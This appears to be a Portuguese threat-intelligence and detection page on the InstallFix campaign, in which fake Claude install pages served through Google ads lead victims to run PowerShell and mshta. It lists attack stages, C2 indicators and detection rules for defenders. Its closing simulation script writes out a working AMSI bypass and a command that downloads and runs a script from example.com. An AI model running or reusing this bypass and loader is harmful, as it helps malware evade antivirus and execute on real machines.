InstallFix e Código Claude: Como Páginas de Instalação Falsas Levam a Compromissos Reais
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
A campanha InstallFix espalha malware através de anúncios maliciosos do Google que imitam páginas de instalação do Claude AI. As vítimas são persuadidas a executar comandos PowerShell que invocam mshta.exe para recuperar um arquivo ZIP e HTA poliglota, que então inicia uma cadeia de infecção sem arquivos em várias etapas. A carga útil desativa a validação SSL e as proteções AMSI, baixa código adicional de um domínio de comando e controle específico da vítima, e cria persistência através de tarefas agendadas. A operação tem como alvo organizações em várias indústrias e regiões ao redor do mundo.
Investigação
Pesquisadores rastrearam todo o fluxo de execução da página de instalação falsa através mshta.exe, VBScript e várias camadas de PowerShell codificado. A desobstrução mostrou que o malware gerou um identificador exclusivo para cada vítima e o usou para construir uma URL de comando e controle específica do host. A telemetria de rede revelou comunicação de saída para múltiplos domínios e endereços IP maliciosos. Embora a carga útil final não tenha sido totalmente recuperada, o comportamento observado sugeriu atividade de coleta e exfiltração de dados.
Mitigação
Os defensores devem bloquear o acesso aos domínios e endereços IP maliciosos identificados e restringir o uso de mshta.exe e outras ferramentas de script legadas sempre que possível. Os controles de segurança de endpoint devem ser ajustados para detectar tentativas de contornar o AMSI e manipulações de validação SSL. As organizações também devem impor filtragem rigorosa de URLs para o tráfego de anúncios do Google que leve a páginas de instalação de software. A conscientização do usuário permanece crítica, especialmente em relação ao risco de executar comandos copiados de resultados de pesquisa patrocinados ou fontes não verificadas.
Resposta
As equipes de segurança devem alertar sobre cadeias de processos em que mshta.exe inicia cmd.exe, powershell.exe, ou interpretadores de script com URLs remotos suspeitos. Esses eventos devem ser correlacionados com a criação de tarefas agendadas e conexões de saída para a infraestrutura conhecida de comando e controle. Se a atividade for confirmada, os defensores devem conter o host, terminar os processos maliciosos e remover quaisquer mecanismos de persistência, como tarefas agendadas. Uma revisão forense deve ser realizada em seguida para identificar quaisquer componentes restantes da carga útil sem arquivos.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes u2013 Actions recon_google_ads["<b>Ação</b> – <b>T1593.002 Pesquisar Sites/Domínios Abertos: Motores de Busca</b><br/><b>Descrição</b>: Adversário coloca resultados patrocinados maliciosos no Google para atrair vítimas que procuram por Claude AI."] class recon_google_ads action initial_access_phishing["<b>Ação</b> – <b>T1566.002 Phishing: Spearphishing Link</b><br/><b>Descrição</b>: A vítima clica em um anúncio malicioso e é redirecionada para uma página de instalação falsa do Claude que hospeda um comando PowerShell."] class initial_access_phishing action user_exec_copy_paste["<b>Ação</b> – <b>T1204.004 Execução do Usuário: Copiar e Colar Malicioso</b><br/><b>Descrição</b>: A vítima copia o comando PowerShell exibido e o executa em um console."] class user_exec_copy_paste action execution_mshta["<b>Ação</b> – <b>T1218.005 Execução de Proxy de Binário do Sistema: Mshta</b><br/><b>Descrição</b>: PowerShell invoca mshta.exe com um URL para um pacote HTA/MSIX poliglota."] class execution_mshta action execution_htavbscript["<b>Ação</b> – <b>T1027 Arquivos ou Informações Ofuscadas</b><br/><b>Descrição</b>: HTA VBScript é executado via mshta, usa objeto COM Shell.Application para iniciar cmd.exe."] class execution_htavbscript action execution_powershell_stager["<b>Ação</b> – <b>T1140 Desofuscar/Decodificar Arquivos ou Informações</b><br/><b>Descrição</b>: Estágio PowerShell é codificado em base64, dividido em variáveis e decodificado com XOR usando a chave u201cAMSI_RESULT_NOT_DETECTEDu201d."] class execution_powershell_stager action defense_evasion_amsi["<b>Ação</b> – <b>T1211 Exploração para Evasão de Defesa</b><br/><b>Descrição</b>: Script desativa a validação de certificado SSL e ajusta AMSI para evitar a detecção."] class defense_evasion_amsi action persistence_scheduled_task["<b>Ação</b> – <b>T1053 Tarefa/Trabalho Agendado</b><br/><b>Descrição</b>: Malware cria uma tarefa agendada para relançar a carga útil após a reinicialização do sistema."] class persistence_scheduled_task action collection_automated["<b>Ação</b> – <b>T1119 Coleta Automatizada</b><br/><b>Descrição</b>: Coleta dados de aplicação de carteira eletrônica e dados de navegador do host comprometido."] class collection_automated action exfiltration_automated["<b>Ação</b> – <b>T1020 Exfiltração Automatizada</b> & <b>T1029 Transferência Agendada</b><br/><b>Descrição</b>: Dados coletados são enviados para domínios controlados pelo atacante, como https://oakenfjrod.ru e IPs 104.21.0.95, 185.177.239.255."] class exfiltration_automated action %% Nodes u2013 Tools / Processes tool_mshta["<b>Ferramenta</b> – <b>Nome</b>: mshta.exe<br/><b>Propósito</b>: Executa arquivos de Aplicações HTML."] class tool_mshta tool tool_cmd["<b>Ferramenta</b> – <b>Nome</b>: cmd.exe<br/><b>Propósito</b>: Interpretador de linha de comando do Windows."] class tool_cmd tool tool_powershell["<b>Ferramenta</b> – <b>Nome</b>: PowerShell<br/><b>Propósito</b>: Motor de script usado para entrega e decodificação da carga útil."] class tool_powershell tool tool_amsi_patch["<b>Ferramenta</b> – <b>Nome</b>: AMSI Patch<br/><b>Propósito</b>: Altera a Interface de Verificação Antimalware para suprimir a detecção."] class tool_amsi_patch tool tool_schtasks["<b>Ferramenta</b> – <b>Nome</b>: schtasks.exe<br/><b>Propósito</b>: Cria e gerencia tarefas agendadas."] class tool_schtasks tool %% Connections u2013 Flow recon_google_ads –>|conduz a| initial_access_phishing initial_access_phishing –>|conduz a| user_exec_copy_paste user_exec_copy_paste –>|executa| tool_powershell tool_powershell –>|chama| execution_mshta execution_mshta –>|usa| tool_mshta execution_mshta –>|baixa| execution_htavbscript execution_htavbscript –>|gera| tool_cmd tool_cmd –>|executa| execution_powershell_stager execution_powershell_stager –>|usa| tool_powershell execution_powershell_stager –>|aplica| defense_evasion_amsi defense_evasion_amsi –>|usa| tool_amsi_patch defense_evasion_amsi –>|cria| persistence_scheduled_task persistence_scheduled_task –>|usa| tool_schtasks persistence_scheduled_task –>|habilita| collection_automated collection_automated –>|aciona| exfiltration_automated "
Fluxo de Ataque
Detecções
Strings Suspeitas no PowerShell (via powershell)
Ver
Comportamento Suspeito de Evasão de Defesa LOLBAS MSHTA Detectado por Comandos Associados (via criação de processos)
Ver
Chamar Métodos .NET Suspeitos a partir do PowerShell (via powershell)
Ver
Tarefa Agendada Suspeita (via auditoria)
Ver
IOCs (HashSha256) para detectar: InstallFix e Claude Code: Como Páginas de Instalação Falsas Levam a Comprometimentos Reais
Ver
IOCs (HashSha1) para detectar: InstallFix e Claude Code: Como Páginas de Instalação Falsas Levam a Comprometimentos Reais
Ver
IOCs (SourceIP) para detectar: InstallFix e Claude Code: Como Páginas de Instalação Falsas Levam a Comprometimentos Reais
Ver
IOCs (DestinationIP) para detectar: InstallFix e Claude Code: Como Páginas de Instalação Falsas Levam a Comprometimentos Reais
Ver
Técnicas de Evasão PowerShell da Campanha InstallFix [Windows PowerShell]
Ver
Campanha InstallFix – Mshta.exe Iniciando Cmd.exe e PowerShell.exe [Criação de Processos do Windows]
Ver
Execução de Simulação
Pré-requisito: A Verificação Preliminar de Telemetria e Linha de Base deve ter sido aprovada.
Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visar gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errôneos.
-
Narrativa de Ataque e Comandos:
O atacante obtém um script PowerShell malicioso via link de spear-phishing (T1566.002) que baixa uma carga útil de um servidor comprometido. Para evitar a detecção do AMSI, o script injeta a stringAMSI_RESULT_NOT_DETECTEDna memória do processo, e então usa oIEXoperador para executar o código baixado. Todo o comando é codificado em Base64 e lançado com a-EncodedCommandflag, satisfazendo todos os três strings seletoras na regra Sigma.Passo a passo:
- Baixar a carga útil maliciosa (um simples one-liner PowerShell que escreve um arquivo).
- Injetar marcador de evasão do AMSI definindo o campo estático privado
amsiInitFailed. - Executar a carga útil via
IEX. - Lançar toda a cadeia usando
powershell.exe -EncodedCommand ….
-
Script de Teste de Regressão:
# Simulação de ataque PowerShell estilo InstallFix # ------------------------------------------------- # 1. Defina o one-liner malicioso $malicious = @" `$bypass = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') .GetField('amsiInitFailed','NonPublic,Static') `$bypass.SetValue(`$null,$true) IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1') "@ # 2. Codifique o script em UTF-16LE e depois em Base64 (requisito do PowerShell) $bytes = [System.Text.Encoding]::Unicode.GetBytes($malicious) $encoded = [Convert]::ToBase64String($bytes) # 3. Execute via powershell.exe com a flag -EncodedCommand $command = "powershell.exe -NoProfile -EncodedCommand $encoded" Write-Host "Iniciando PowerShell malicioso..." Invoke-Expression $command -
Comandos de Limpeza:
# Remova quaisquer arquivos temporários e termine processos persistentes Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Write-Host "Limpeza completa."